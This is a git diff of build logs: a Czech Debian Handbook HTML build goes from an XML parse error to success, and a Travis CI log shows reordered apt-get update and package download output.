diff --git a/log/cs-CZ/build-html/stderr.log b/log/cs-CZ/build-html/stderr.log
index 665125643..e69de29bb 100644
--- a/log/cs-CZ/build-html/stderr.log
+++ b/log/cs-CZ/build-html/stderr.log
@@ -1,7 +0,0 @@
-
-not well-formed (invalid token) at line 4, column 395, byte 588:
-<!DOCTYPE para PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
-]>
-<para>Tato kniha má své vlastní webové stránky, které obsahují různé užitečné prvky. Zejména obsahují online verzi knihy s odkazy na kliknutí, a případné chyby. Neváhejte si je prohlédnut a nechat nám nějakou zpětnou vazbu. Rádi si přečteme vaše komentáře nebo zprávy. Pošlete je e-mailem na <email>hertzog@debian.org</email> (Raphaël) a <email>lolando@debian.org</email> (Roland).<ulink type=""block"" url=""http://debian-handbook.info/""></ulink></para>
-==========================================================================================================================================================================================================================================================================================================================================================================================================^
- at /usr/lib/x86_64-linux-gnu/perl5/5.28/XML/Parser.pm line 187.
diff --git a/log/cs-CZ/build-html/stdout.log b/log/cs-CZ/build-html/stdout.log
index a5c671f0e..87638f9fa 100644
--- a/log/cs-CZ/build-html/stdout.log
+++ b/log/cs-CZ/build-html/stdout.log
@@ -1 +1 @@
-ERROR: failed to build HTML output for cs-CZ
+SUCCESS: publish/cs-CZ/Debian/9/html/debian-handbook/index.html
diff --git a/logger/travis.log b/logger/travis.log
index 6efe8316b..b422db3ce 100644
--- a/logger/travis.log
+++ b/logger/travis.log
@@ -126,7 +126,7 @@ uid=0(root) gid=0(root) groups=0(root)
 + id --group
 + readonly CURRENT_GROUP_ID=0
 + hostname
-+ readonly CURRENT_HOST=travis-job-9f998d38-bcbd-4f2f-a7db-d96804b2aad4
++ readonly CURRENT_HOST=travis-job-db313500-18a3-466c-84fe-6e939a178376
 + return 0
 + return 0
 + test root != root
@@ -181,8 +181,8 @@ uid=0(root) gid=0(root) groups=0(root)
  [ - ]  unattended-upgrades
  [ - ]  urandom
  [ - ]  x11-common
-+ tee /usr/sbin/policy-rc.d
-+ cat
++ + tee /usr/sbin/policy-rc.d
+cat
 #!/bin/dash
 {
 	set -eux;
@@ -200,18 +200,18 @@ uid=0(root) gid=0(root) groups=0(root)
 	1>&2 \
 ;
 + chmod a+x /usr/sbin/policy-rc.d
-+ tee /etc/apt/apt.conf.d/01norecommend
 + cat
++ tee /etc/apt/apt.conf.d/01norecommend
 APT::Install-Recommends "0";
 APT::Install-Suggests "0";
 + cat
 + tee /etc/apt/apt.conf.d/02force-conf
 DPkg::options { "--force-confdef"; "--force-confnew"; }
-+ tee /etc/apt/apt.conf.d/03allow-unauthenticated
 + cat
++ tee /etc/apt/apt.conf.d/03allow-unauthenticated
 // APT::Get::AllowUnauthenticated "true";
-+ + cat
-tee /etc/apt/preferences.d/01exclude-package-upgrade
++ cat
++ tee /etc/apt/preferences.d/01exclude-package-upgrade
 Explanation: apt-get update was failed.
 Explanation: Remove this entry if update is successfully finished.
 Package: oracle-java9-installer
@@ -221,8 +221,8 @@ Pin-Priority: 1001
 + apt_get_install_pre
 + cat /etc/debian_version
 jessie/sid
-+ apt-config dump
-+ grep --regexp=APT::Install- --regexp=DPkg::options --regexp=APT::Get::
++ + grep --regexp=APT::Install- --regexp=DPkg::options --regexp=APT::Get::apt-config
+ dump
 APT::Install-Recommends "1";
 APT::Install-Suggests "0";
 APT::Get::Assume-Yes "true";
@@ -320,108 +320,108 @@ Get:1 http://dl.hhvm.com/ubuntu trusty InRelease [3106 B]
 Ign:2 http://repo.mongodb.org/apt/ubuntu trusty/mongodb-org/3.4 InRelease
 Get:3 http://repo.mongodb.org/apt/ubuntu trusty/mongodb-org/3.4 Release [2495 B]
 Get:4 http://repo.mongodb.org/apt/ubuntu trusty/mongodb-org/3.4 Release.gpg [801 B]
-Get:6 http://apt.postgresql.org/pub/repos/apt trusty-pgdg InRelease [61.4 kB]
+Ign:5 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty InRelease
+Get:6 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates InRelease [65.9 kB]
 Get:8 http://dl.hhvm.com/ubuntu trusty/main amd64 Packages [1809 B]
-Ign:9 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty InRelease
+Get:9 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-backports InRelease [65.9 kB]
+Get:10 http://security.ubuntu.com/ubuntu trusty-security InRelease [65.9 kB]
+Get:11 http://ppa.launchpad.net/chris-lea/redis-server/ubuntu trusty InRelease [15.4 kB]
 Ign:7 http://toolbelt.heroku.com/ubuntu ./ InRelease
-Get:10 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates InRelease [65.9 kB]
-Get:11 http://security.ubuntu.com/ubuntu trusty-security InRelease [65.9 kB]
-Get:12 http://ppa.launchpad.net/chris-lea/redis-server/ubuntu trusty InRelease [15.4 kB]
-Get:5 http://dl.bintray.com/apache/cassandra 39x InRelease [3168 B]
-Hit:13 http://toolbelt.heroku.com/ubuntu ./ Release
-Get:14 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 Packages [200 kB]
-Get:15 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-backports InRelease [65.9 kB]
-Ign:16 http://dl.google.com/linux/chrome/deb stable InRelease
+Get:12 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty Release [58.5 kB]
+Get:15 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main Sources [527 kB]
+Get:16 http://apt.postgresql.org/pub/repos/apt trusty-pgdg InRelease [61.4 kB]
 Get:17 https://download.docker.com/linux/ubuntu trusty InRelease [37.1 kB]
-Get:18 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main i386 Packages [199 kB]
+Ign:18 http://dl.google.com/linux/chrome/deb stable InRelease
+Hit:13 http://toolbelt.heroku.com/ubuntu ./ Release
 Get:19 http://dl.google.com/linux/chrome/deb stable Release [943 B]
-Get:20 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty Release [58.5 kB]
-Get:21 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty Release.gpg [933 B]
-Get:22 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main Sources [527 kB]
-Ign:24 http://ppa.launchpad.net/couchdb/stable/ubuntu trusty InRelease
-Get:25 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/restricted Sources [6449 B]
-Get:26 http://dl.google.com/linux/chrome/deb stable Release.gpg [819 B]
-Get:27 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/universe Sources [288 kB]
-Get:28 http://repo.mongodb.org/apt/ubuntu trusty/mongodb-org/3.4/multiverse amd64 Packages [13.6 kB]
-Get:29 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/multiverse Sources [7287 B]
-Get:30 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 Packages [1421 kB]
-Get:31 https://download.docker.com/linux/ubuntu trusty/stable amd64 Packages [5207 B]
-Get:32 https://download.docker.com/linux/ubuntu trusty/edge amd64 Packages [6366 B]
-Get:33 http://ppa.launchpad.net/git-core/ppa/ubuntu trusty InRelease [20.8 kB]
-Get:34 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main i386 Packages [1328 kB]
-Get:35 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main Translation-en [682 kB]
-Get:36 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/restricted amd64 Packages [21.4 kB]
-Get:37 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/restricted i386 Packages [21.1 kB]
-Get:38 https://packagecloud.io/computology/apt-backport/ubuntu trusty InRelease [23.5 kB]
-Get:39 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/restricted Translation-en [3704 B]
-Get:40 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/universe amd64 Packages [660 kB]
+Get:20 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/restricted Sources [6449 B]
+Get:21 http://repo.mongodb.org/apt/ubuntu trusty/mongodb-org/3.4/multiverse amd64 Packages [13.6 kB]
+Get:14 http://dl.bintray.com/apache/cassandra 39x InRelease [3168 B]
+Get:22 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/universe Sources [288 kB]
+Get:23 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/multiverse Sources [7287 B]
+Get:24 https://download.docker.com/linux/ubuntu trusty/stable amd64 Packages [5207 B]
+Get:25 https://download.docker.com/linux/ubuntu trusty/edge amd64 Packages [6366 B]
+Get:26 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 Packages [1421 kB]
+Ign:27 http://ppa.launchpad.net/couchdb/stable/ubuntu trusty InRelease
+Get:28 http://dl.google.com/linux/chrome/deb stable Release.gpg [819 B]
+Get:29 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main i386 Packages [1328 kB]
+Get:31 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main Translation-en [682 kB]
+Get:32 http://ppa.launchpad.net/git-core/ppa/ubuntu trusty InRelease [20.8 kB]
+Get:33 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/restricted amd64 Packages [21.4 kB]
+Get:34 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/restricted i386 Packages [21.1 kB]
+Get:35 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/restricted Translation-en [3704 B]
+Get:36 https://packagecloud.io/computology/apt-backport/ubuntu trusty InRelease [23.5 kB]
+Get:37 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/universe amd64 Packages [660 kB]
+Get:38 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/universe i386 Packages [641 kB]
+Get:39 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/universe Translation-en [342 kB]
+Get:40 http://security.ubuntu.com/ubuntu trusty-security/main Sources [216 kB]
 Get:41 http://ppa.launchpad.net/openjdk-r/ppa/ubuntu trusty InRelease [15.4 kB]
-Get:42 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/universe i386 Packages [641 kB]
-Get:43 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/universe Translation-en [342 kB]
-Get:44 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/multiverse amd64 Packages [16.0 kB]
-Get:45 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/multiverse i386 Packages [16.5 kB]
-Get:46 http://security.ubuntu.com/ubuntu trusty-security/main Sources [216 kB]
-Get:47 http://dl.google.com/linux/chrome/deb stable/main amd64 Packages [1110 B]
-Get:48 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/multiverse Translation-en [7680 B]
-Get:49 https://packagecloud.io/github/git-lfs/ubuntu trusty InRelease [23.2 kB]
-Get:50 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-backports/main Sources [10.4 kB]
-Get:51 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-backports/restricted Sources [40 B]
-Get:52 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-backports/universe Sources [41.3 kB]
-Get:53 http://ppa.launchpad.net/pollinate/ppa/ubuntu trusty InRelease [15.4 kB]
+Get:42 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/multiverse amd64 Packages [16.0 kB]
+Get:43 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/multiverse i386 Packages [16.5 kB]
+Get:44 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/multiverse Translation-en [7680 B]
+Get:45 https://packagecloud.io/github/git-lfs/ubuntu trusty InRelease [23.2 kB]
+Get:46 http://dl.google.com/linux/chrome/deb stable/main amd64 Packages [1110 B]
+Get:47 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 Packages [200 kB]
+Get:48 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty Release.gpg [933 B]
+Get:49 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-backports/main Sources [10.4 kB]
+Get:50 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-backports/restricted Sources [40 B]
+Get:51 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-backports/universe Sources [41.3 kB]
+Get:52 https://packagecloud.io/rabbitmq/rabbitmq-server/ubuntu trusty InRelease [23.7 kB]
+Err:45 https://packagecloud.io/github/git-lfs/ubuntu trusty InRelease
+  The following signatures couldn't be verified because the public key is not available: NO_PUBKEY 6B05F25D762E3157
+Get:53 http://security.ubuntu.com/ubuntu trusty-security/restricted Sources [5050 B]
 Get:54 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-backports/multiverse Sources [1747 B]
-Get:55 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-backports/main amd64 Packages [14.7 kB]
-Get:56 https://packagecloud.io/rabbitmq/rabbitmq-server/ubuntu trusty InRelease [23.7 kB]
+Get:55 http://ppa.launchpad.net/pollinate/ppa/ubuntu trusty InRelease [15.4 kB]
+Get:56 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-backports/main amd64 Packages [14.7 kB]
 Get:57 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-backports/main i386 Packages [14.7 kB]
-Err:49 https://packagecloud.io/github/git-lfs/ubuntu trusty InRelease
-  The following signatures couldn't be verified because the public key is not available: NO_PUBKEY 6B05F25D762E3157
-Get:58 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-backports/main Translation-en [7426 B]
-Get:59 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-backports/restricted amd64 Packages [40 B]
-Get:60 http://security.ubuntu.com/ubuntu trusty-security/restricted Sources [5050 B]
+Get:58 http://security.ubuntu.com/ubuntu trusty-security/universe Sources [125 kB]
+Get:59 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-backports/main Translation-en [7426 B]
+Get:60 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-backports/restricted amd64 Packages [40 B]
 Get:61 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-backports/restricted i386 Packages [40 B]
-Get:62 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-backports/restricted Translation-en [40 B]
-Get:63 https://packagecloud.io/computology/apt-backport/ubuntu trusty/main amd64 Packages [3628 B]
-Get:64 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-backports/universe amd64 Packages [52.5 kB]
-Get:65 http://security.ubuntu.com/ubuntu trusty-security/universe Sources [125 kB]
-Get:66 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-backports/universe i386 Packages [52.4 kB]
-Get:67 http://ppa.launchpad.net/webupd8team/java/ubuntu trusty InRelease [15.5 kB]
+Get:62 https://packagecloud.io/computology/apt-backport/ubuntu trusty/main amd64 Packages [3628 B]
+Get:63 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-backports/restricted Translation-en [40 B]
+Get:64 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main i386 Packages [199 kB]
+Get:65 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-backports/universe amd64 Packages [52.5 kB]
+Get:66 http://security.ubuntu.com/ubuntu trusty-security/multiverse Sources [3068 B]
+Get:67 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-backports/universe i386 Packages [52.4 kB]
 Get:68 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-backports/universe Translation-en [40.0 kB]
-Get:69 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-backports/multiverse amd64 Packages [1392 B]
-Get:70 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-backports/multiverse i386 Packages [1376 B]
-Get:71 http://security.ubuntu.com/ubuntu trusty-security/multiverse Sources [3068 B]
-Get:72 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-backports/multiverse Translation-en [1165 B]
-Get:73 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty/main Sources [1335 kB]
-Get:74 https://packagecloud.io/rabbitmq/rabbitmq-server/ubuntu trusty/main amd64 Packages [7165 B]
-Get:75 http://security.ubuntu.com/ubuntu trusty-security/main amd64 Packages [1000 kB]
+Get:69 http://ppa.launchpad.net/webupd8team/java/ubuntu trusty InRelease [15.5 kB]
+Get:70 http://security.ubuntu.com/ubuntu trusty-security/main amd64 Packages [1000 kB]
+Get:71 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-backports/multiverse amd64 Packages [1392 B]
+Get:72 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-backports/multiverse i386 Packages [1376 B]
+Get:73 https://packagecloud.io/rabbitmq/rabbitmq-server/ubuntu trusty/main amd64 Packages [7165 B]
+Get:74 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-backports/multiverse Translation-en [1165 B]
+Get:75 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty/main Sources [1335 kB]
 Get:76 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty/restricted Sources [5335 B]
 Get:77 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty/universe Sources [7926 kB]
-Hit:78 http://ppa.launchpad.net/couchdb/stable/ubuntu trusty Release
-Get:79 https://packagecloud.io/rabbitmq/rabbitmq-server/ubuntu trusty/main i386 Packages [7165 B]
-Get:81 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty/multiverse Sources [211 kB]
-Get:82 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty/main amd64 Packages [1743 kB]
-Get:83 http://ppa.launchpad.net/chris-lea/redis-server/ubuntu trusty/main amd64 Packages [1844 B]
-Get:84 http://security.ubuntu.com/ubuntu trusty-security/main i386 Packages [912 kB]
-Get:85 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty/main i386 Packages [1739 kB]
-Get:86 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty/restricted amd64 Packages [16.0 kB]
-Get:87 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty/restricted i386 Packages [16.4 kB]
-Get:88 http://security.ubuntu.com/ubuntu trusty-security/main Translation-en [525 kB]
-Get:89 http://ppa.launchpad.net/chris-lea/redis-server/ubuntu trusty/main i386 Packages [1844 B]
-Get:90 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty/universe amd64 Packages [7589 kB]
-Get:91 http://security.ubuntu.com/ubuntu trusty-security/restricted amd64 Packages [18.1 kB]
-Get:92 http://security.ubuntu.com/ubuntu trusty-security/restricted i386 Packages [17.8 kB]
-Get:93 http://ppa.launchpad.net/chris-lea/redis-server/ubuntu trusty/main Translation-en [990 B]
-Get:94 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty/universe i386 Packages [7597 kB]
-Get:95 http://security.ubuntu.com/ubuntu trusty-security/restricted Translation-en [3272 B]
-Get:96 http://security.ubuntu.com/ubuntu trusty-security/universe amd64 Packages [367 kB]
-Get:97 http://ppa.launchpad.net/git-core/ppa/ubuntu trusty/main amd64 Packages [3486 B]
-Get:98 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty/multiverse amd64 Packages [169 kB]
-Get:99 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty/multiverse i386 Packages [172 kB]
-Get:100 http://security.ubuntu.com/ubuntu trusty-security/universe i386 Packages [350 kB]
+Get:78 https://packagecloud.io/rabbitmq/rabbitmq-server/ubuntu trusty/main i386 Packages [7165 B]
+Hit:79 http://ppa.launchpad.net/couchdb/stable/ubuntu trusty Release
+Get:80 http://security.ubuntu.com/ubuntu trusty-security/main i386 Packages [912 kB]
+Get:82 http://ppa.launchpad.net/chris-lea/redis-server/ubuntu trusty/main amd64 Packages [1844 B]
+Get:83 http://security.ubuntu.com/ubuntu trusty-security/main Translation-en [525 kB]
+Get:84 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty/multiverse Sources [211 kB]
+Get:85 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty/main amd64 Packages [1743 kB]
+Get:86 http://security.ubuntu.com/ubuntu trusty-security/restricted amd64 Packages [18.1 kB]
+Get:87 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty/main i386 Packages [1739 kB]
+Get:88 http://ppa.launchpad.net/chris-lea/redis-server/ubuntu trusty/main i386 Packages [1844 B]
+Get:89 http://security.ubuntu.com/ubuntu trusty-security/restricted i386 Packages [17.8 kB]
+Get:90 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty/restricted amd64 Packages [16.0 kB]
+Get:91 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty/restricted i386 Packages [16.4 kB]
+Get:92 http://security.ubuntu.com/ubuntu trusty-security/restricted Translation-en [3272 B]
+Get:93 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty/universe amd64 Packages [7589 kB]
+Get:94 http://ppa.launchpad.net/chris-lea/redis-server/ubuntu trusty/main Translation-en [990 B]
+Get:95 http://security.ubuntu.com/ubuntu trusty-security/universe amd64 Packages [367 kB]
+Get:96 http://security.ubuntu.com/ubuntu trusty-security/universe i386 Packages [350 kB]
+Get:97 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty/universe i386 Packages [7597 kB]
+Get:98 http://ppa.launchpad.net/git-core/ppa/ubuntu trusty/main amd64 Packages [3486 B]
+Get:99 http://security.ubuntu.com/ubuntu trusty-security/universe Translation-en [199 kB]
+Get:100 http://security.ubuntu.com/ubuntu trusty-security/multiverse amd64 Packages [4723 B]
 Get:101 http://ppa.launchpad.net/git-core/ppa/ubuntu trusty/main i386 Packages [3484 B]
-Get:102 http://security.ubuntu.com/ubuntu trusty-security/universe Translation-en [199 kB]
-Get:103 http://security.ubuntu.com/ubuntu trusty-security/multiverse amd64 Packages [4723 B]
-Get:104 http://ppa.launchpad.net/git-core/ppa/ubuntu trusty/main Translation-en [2332 B]
-Get:105 http://security.ubuntu.com/ubuntu trusty-security/multiverse i386 Packages [4876 B]
-Get:106 http://security.ubuntu.com/ubuntu trusty-security/multiverse Translation-en [2426 B]
+Get:102 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty/multiverse amd64 Packages [169 kB]
+Get:103 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty/multiverse i386 Packages [172 kB]
+Get:104 http://security.ubuntu.com/ubuntu trusty-security/multiverse i386 Packages [4876 B]
+Get:105 http://security.ubuntu.com/ubuntu trusty-security/multiverse Translation-en [2426 B]
+Get:106 http://ppa.launchpad.net/git-core/ppa/ubuntu trusty/main Translation-en [2332 B]
 Get:107 http://ppa.launchpad.net/openjdk-r/ppa/ubuntu trusty/main amd64 Packages [7571 B]
 Get:108 http://ppa.launchpad.net/openjdk-r/ppa/ubuntu trusty/main i386 Packages [7700 B]
 Get:109 http://ppa.launchpad.net/openjdk-r/ppa/ubuntu trusty/main Translation-en [2388 B]
@@ -431,7 +431,7 @@ Get:112 http://ppa.launchpad.net/pollinate/ppa/ubuntu trusty/main Translation-en
 Get:113 http://ppa.launchpad.net/webupd8team/java/ubuntu trusty/main amd64 Packages [1553 B]
 Get:114 http://ppa.launchpad.net/webupd8team/java/ubuntu trusty/main i386 Packages [1553 B]
 Get:115 http://ppa.launchpad.net/webupd8team/java/ubuntu trusty/main Translation-en [834 B]
-Fetched 39.5 MB in 4s (7981 kB/s)
+Fetched 39.5 MB in 5s (6954 kB/s)
 Reading package lists...
 W: An error occurred during the signature verification. The repository is not updated and the previous index files will be used. GPG error: https://packagecloud.io/github/git-lfs/ubuntu trusty InRelease: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY 6B05F25D762E3157
 W: http://ppa.launchpad.net/couchdb/stable/ubuntu/dists/trusty/Release.gpg: Signature by key 15866BAFD9BCC4F3C1E0DFC7D69548E1C17EAB57 uses weak digest algorithm (SHA1)
@@ -694,284 +694,284 @@ The following packages will be upgraded:
 285 upgraded, 0 newly installed, 0 to remove and 9 not upgraded.
 Need to get 430 MB of archives.
 After this operation, 23.2 MB disk space will be freed.
-Get:1 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 libpq-dev amd64 11.2-1.pgdg14.04+1 [160 kB]
-Get:2 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 dpkg amd64 1.17.5ubuntu5.8 [1958 kB]
-Get:3 http://repo.mongodb.org/apt/ubuntu trusty/mongodb-org/3.4/multiverse amd64 mongodb-org-shell amd64 3.4.19 [8078 kB]
-Get:4 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 libpq5 amd64 11.2-1.pgdg14.04+1 [164 kB]
-Get:5 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 pgdg-keyring all 2018.2 [10.7 kB]
-Get:6 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 postgresql-contrib-9.3 amd64 9.3.25-1.pgdg14.04+1 [418 kB]
-Get:7 http://ppa.launchpad.net/openjdk-r/ppa/ubuntu trusty/main amd64 openjdk-8-jdk amd64 8u171-b11-2~14.04 [502 kB]
-Get:8 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 postgresql-common all 199.pgdg14.04+1 [224 kB]
-Get:9 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 postgresql-client-common all 199.pgdg14.04+1 [83.6 kB]
-Get:10 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 postgresql-client-9.3 amd64 9.3.25-1.pgdg14.04+1 [1061 kB]
-Get:11 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 perl amd64 5.18.2-2ubuntu1.7 [2650 kB]
-Get:12 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 postgresql-9.3 amd64 9.3.25-1.pgdg14.04+1 [3515 kB]
-Get:13 http://repo.mongodb.org/apt/ubuntu trusty/mongodb-org/3.4/multiverse amd64 mongodb-org-server amd64 3.4.19 [14.5 MB]
-Get:14 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 perl-base amd64 5.18.2-2ubuntu1.7 [1150 kB]
-Get:15 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 perl-modules all 5.18.2-2ubuntu1.7 [2674 kB]
-Get:16 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 postgresql-contrib-9.4 amd64 9.4.21-1.pgdg14.04+1 [453 kB]
-Get:17 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 postgresql-client-9.4 amd64 9.4.21-1.pgdg14.04+1 [1102 kB]
-Get:18 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libc6-dev amd64 2.19-0ubuntu6.14 [1913 kB]
-Get:19 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 postgresql-9.4 amd64 9.4.21-1.pgdg14.04+1 [3724 kB]
-Get:20 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libc-dev-bin amd64 2.19-0ubuntu6.14 [69.0 kB]
-Get:21 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 linux-libc-dev amd64 3.13.0-165.215 [773 kB]
-Get:22 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 postgresql-contrib-9.5 amd64 9.5.16-1.pgdg14.04+1 [459 kB]
-Get:23 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libc-bin amd64 2.19-0ubuntu6.14 [1166 kB]
-Get:24 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 postgresql-client-9.5 amd64 9.5.16-1.pgdg14.04+1 [1200 kB]
-Get:25 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libc6 amd64 2.19-0ubuntu6.14 [4753 kB]
-Get:26 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 postgresql-9.5 amd64 9.5.16-1.pgdg14.04+1 [3940 kB]
-Get:27 http://repo.mongodb.org/apt/ubuntu trusty/mongodb-org/3.4/multiverse amd64 mongodb-org-mongos amd64 3.4.19 [8379 kB]
-Get:28 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 zlib1g-dev amd64 1:1.2.8.dfsg-1ubuntu1.1 [166 kB]
-Get:29 http://ppa.launchpad.net/openjdk-r/ppa/ubuntu trusty/main amd64 openjdk-8-jdk-headless amd64 8u171-b11-2~14.04 [8188 kB]
-Get:30 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 zlib1g amd64 1:1.2.8.dfsg-1ubuntu1.1 [49.8 kB]
-Get:31 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 postgresql-contrib-9.6 amd64 9.6.12-1.pgdg14.04+1 [503 kB]
-Get:32 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libpng12-dev amd64 1.2.50-1ubuntu2.14.04.3 [206 kB]
-Get:33 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 postgresql-client-9.6 amd64 9.6.12-1.pgdg14.04+1 [1287 kB]
-Get:34 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libpng12-0 amd64 1.2.50-1ubuntu2.14.04.3 [118 kB]
